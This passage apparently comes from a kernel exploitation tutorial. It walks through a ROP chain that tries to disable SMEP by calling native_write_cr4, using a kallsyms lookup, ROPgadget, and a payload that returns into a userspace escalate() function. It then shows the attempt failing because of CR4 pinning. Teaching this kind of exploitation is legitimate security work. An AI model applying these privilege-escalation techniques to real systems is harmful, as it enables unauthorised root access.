It's worth noting what this kernel panic looks like for future reference - especially these 3 lines:
[ 1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[ 1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.633781] #PF: supervisor instruction fetch in kernel mode
Overwriting CR4
So, instead of just returning to userspace, we will try to overwrite CR4 first. Luckily, the kernel contains a very useful function for this: native_write_cr4(val), which quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):
~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4
Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? The kernel panic above tells us that CR4 is currently 0x00000000001006b0. SMEP is bit 20 (zero-indexed from the least significant bit), so clearing it gives us 0x6b0.
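As a quick sanity check, we can verify the arithmetic with a standalone snippet (not part of the exploit itself):

#include <stdio.h>

int main(void) {
    unsigned long cr4  = 0x1006b0;   // value reported in the panic
    unsigned long smep = 1UL << 20;  // SMEP is CR4 bit 20
    printf("0x%lx\n", cr4 & ~smep);  // prints 0x6b0
    return 0;
}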
The last thing we need to do is find some gadgets. For that, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it, which we can do with extract-vmlinux from the official Linux git repository.
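Assuming extract-vmlinux has been copied into the current directory (in the kernel tree it lives under scripts/), that looks something like:

$ ./extract-vmlinux bzImage > vmlinux
$ ROPgadget --binary vmlinux | grep "pop rdi ; ret"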
// overflow
uint64_t payload[20];
int i = 6;                           // first 6 qwords pad up to the saved return address
payload[i++] = 0xffffffff811e08ec;   // pop rdi; ret
payload[i++] = 0x6b0;                // CR4 value with the SMEP bit (bit 20) cleared
payload[i++] = 0xffffffff8102b6d0;   // native_write_cr4(0x6b0)
payload[i++] = (uint64_t) escalate;  // "return" into our userspace escalate() function
write(fd, payload, sizeof(payload)); // send the whole chain through the vulnerable write
We can then compile and run it.
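For example, assuming the usual static build so the binary runs inside the minimal initramfs:

$ gcc -static -o exploit exploit.c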
Failure
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
[ 1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[ 1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.547037] #PF: supervisor instruction fetch in kernel mode
SMEP is still enabled. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4() - so what gives?
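If you want to verify this yourself, and assuming the VM exposes QEMU's gdb stub (the -s flag, port 1234), you can break on the function directly:

$ gdb vmlinux
(gdb) target remote :1234
(gdb) break *0xffffffff8102b6d0
(gdb) continue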
Well, if we look at the kernel source for native_write_cr4(), there's another protection:
void __no_profile native_write_cr4(unsigned long val)
{
    unsigned long bits_changed = 0;

set_register:
    asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

    if (static_branch_likely(&cr_pinning)) {
        if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
            bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
            val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
            goto set_register;
        }
        /* Warn after we've corrected the changed bits. */
        WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
                  bits_changed);
    }
}
Essentially, it checks whether the val we pass in clears any of the bits defined in cr4_pinned_bits. This value is captured on boot, and stops "sensitive CR bits" from being modified: if any pinned bit is changed, the kernel simply restores it (and logs a warning). Effectively, disabling SMEP by overwriting CR4 doesn't work any longer - and hasn't since version 5.3-rc1.
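To make the fix-up concrete, here is roughly what happens to our value (a simplified sketch - the real cr4_pinned_mask pins SMAP and UMIP as well as SMEP):

unsigned long cr4_pinned_mask = 1UL << 20;                   // just SMEP, for illustration
unsigned long cr4_pinned_bits = 0x1006b0 & cr4_pinned_mask;  // captured at boot -> 0x100000
unsigned long val = 0x6b0;                                   // what our ROP chain writes
// (val & cr4_pinned_mask) != cr4_pinned_bits, so the kernel repairs it:
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;            // -> 0x1006b0, SMEP is back on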